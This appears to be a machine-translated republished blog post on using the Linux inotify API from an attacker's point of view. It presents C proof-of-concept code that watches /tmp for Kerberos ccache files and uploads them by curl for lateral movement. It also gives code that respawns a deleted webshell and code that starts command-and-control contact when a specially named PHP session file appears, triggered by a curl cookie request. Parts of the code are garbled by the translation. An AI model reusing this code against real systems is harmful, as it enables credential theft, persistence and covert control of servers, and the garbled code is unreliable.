Shulou(Shulou.com)06/02 Report--

This article will explain in detail how to rethink the use of inotity API from the point of view of attackers. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

In the past, when we looked at the use of "inotify API", we focused on the defense side, for example, IT administrators used to monitor changes in files or directories to assist in troubleshooting intrusions. We will focus on the attacking side to familiarize you with the creepy use of inotify API.

0x00 steals ccache files

In an enterprise network, it is common for linux and windows systems to coexist and delegate authentication to AD. When an attacker gains privileges on a Linux host, he usually looks at the / tmp directory for the credential cache file (ccache), which usually contains TGT (Ticket-Granting-Ticket) for user-to-service authentication through the kerberos protocol.

The file is named as "krb5cc_%UID%" and can be used directly by tools based on the impacket framework. So if we can read the file, we can use tools such as psexec.py/smbexec.py to try to execute commands on other machines on the intranet to move horizontally (even if we are lucky enough to get this file from a privileged user). When we do know that the network is authenticated using kerberos, but we can't get the file now (because the file has a short life), we can set up an Inotify watcher to monitor the / tmp directory and forward it to us when the file is created.

Our plan is very simple. As mentioned above, create a new watcher to monitor the / tmp directory. If a file with the prefix "krb5cc_" is created or modified, send it to us as follows:

/ / Example based on https://www.lynxbee.com/c-program-to-monitor-and-notify-changes-in-a-directory-file-using-inotify/

# define _ GNU_SOURCE

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

Number of events to process at one go*/

# define LEN_NAME 1024 / * Assuming length of the filename won't exceed 16 bytes*/

# define EVENT_SIZE (sizeof (struct inotify_event)) / * sizeof one event*/

# define BUF_LEN (MAX_EVENTS * (EVENT_SIZE + LEN_NAME)) / * buffer to store the data of events*/

# define endpoint "http://localhost:4444"

Int exfiltrate (char* filename) {

CURL * curl

CURLcode res

Struct stat file_info

FILE * fd

Fd = fopen (filename, "rb")

If (! fd) {

Return-1

}

If (fstat (fileno (fd), & file_info)! = 0) {

Return-1

}

Curl = curl_easy_init ()

If (curl) {

Curl_easy_setopt (curl, CURLOPT_URL, endpoint)

Curl_easy_setopt (curl, CURLOPT_UPLOAD, 1L)

Curl_easy_setopt (curl, CURLOPT_READDATA, fd)

Res = curl_easy_perform (curl)

If (res! = CURLE_OK) {

Return-1

}

Curl_easy_cleanup (curl)

}

Fclose (fd)

Return 0

}

Int main (int argc, char * * argv) {

Int length, I = 0, wd

Int fd

Char buffer[BUF _ LEN]

Char * ticketloc = NULL

Printf ("[Kerberos ccache exfiltrator PoC]\ n\ n")

/ / Initiate inotify

If ((fd = inotify_init ())

< 0) { printf("Could not initiate inotify!!\n"); return -1; } //Add a watcher for the creation or modification of files at /tmp folder if ((wd = inotify_add_watch(fd, "/tmp", IN_CREATE | IN_MODIFY)) == -1) { printf("Could not add a watcher!!\n"); return -2; } //Main loop while(1) { i = 0; length = read(fd, buffer, BUF_LEN); if (length < 0) { return -3; } while (i < length) { struct inotify_event *event = (struct inotify_event *)&buffer[i]; if (event->

Len) {

/ / Check for prefix

If (strncmp (event- > name, "krb5cc_", strlen ("krb5cc_")) = = 0) {

Printf ("New cache file found! (% s)", event- > name)

Asprintf (& ticketloc, "/ tmp/%s", event- > name)

/ / Forward it to us

If (exfiltrate (ticketloc)! = 0) {

Printf ("- Failed!\ n")

}

Else {

Printf ("- Exfiltrated!\ n")

}

Free (ticketloc)

}

I + = EVENT_SIZE + event- > len

}

}

}

}

After monitoring the creation of the file, we can use LDAP search to detect the permissions of the current user.

Another common scenario is that when the webshell we placed is deleted (due to the administrator's discovery, CMS update, etc.), we can create another one when the webshell is deleted by using inotify, and inform us that the code is as follows

Int main (int argc, char * * argv) {int length, I = 0, wd; int fd; char buffer [BUF _ LEN]; / / Initiate inotify if ((fd = inotify_init ())

< 0) { printf("Could not initiate inotify!!\n"); return -1; } //Webshell locationif ((wd = inotify_add_watch(fd, "/var/www/html/my_shinny_webshell.php", IN_DELETE | IN_DELETE_SELF) == -1) { printf("Could not add a watcher!!\n"); return -2; } //Main loop while(1) { i = 0; length = read(fd, buffer, BUF_LEN); if (length < 0) { return -3; } while (i < length) { struct inotify_event *event = (struct inotify_event *)&buffer[i]; if (event->

Len) {respawn_webshell (); I + = EVENT_SIZE + event- > len;}

Other ideas: when a legitimate PHP file is modified, also put our back door in. Alternatively, monitor the configuration file to detect whether the database link account has changed.

0x02 triggers malware behavior based on PHP session name

We can communicate with our Implants commands by creating a named file that stores the PHP session as a hidden channel. For example, in the following example, I imagine communicating with our CC when a file named sess_ALEAIACTAESTXX is created.

Int main (int argc, char * * argv) {int length, I = 0, wd; int fd; char buffer [BUF _ LEN]; / / Initiate inotify if ((fd = inotify_init ())

< 0) { printf("Could not initiate inotify!!\n"); return -1; } //Session folder as set in session.save_path if ((wd = inotify_add_watch(fd, "/var/lib/php/session", IN_CREATE) == -1) { printf("Could not add a watcher!!\n"); return -2; } //Main loop while(1) { i = 0; length = read(fd, buffer, BUF_LEN); if (length < 0) { return -3; } while (i < length) { struct inotify_event *event = (struct inotify_event *)&buffer[i]; if (event->

Len) {if (strncmp (event- > name, "sess_ALEAIACTAEST", strlen ("sess_ALEAIACTAEST")) = = 0) {start_communication_with_CC ();} I + = EVENT_SIZE + event- > len;}

With a simple CURL request (curl http://localhost/test.php-- cookie "PHPSESSID=ALEAIACTAESTx1"), we can trigger this action.

So much for sharing about how to rethink the use of inotity API from the attacker's point of view. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.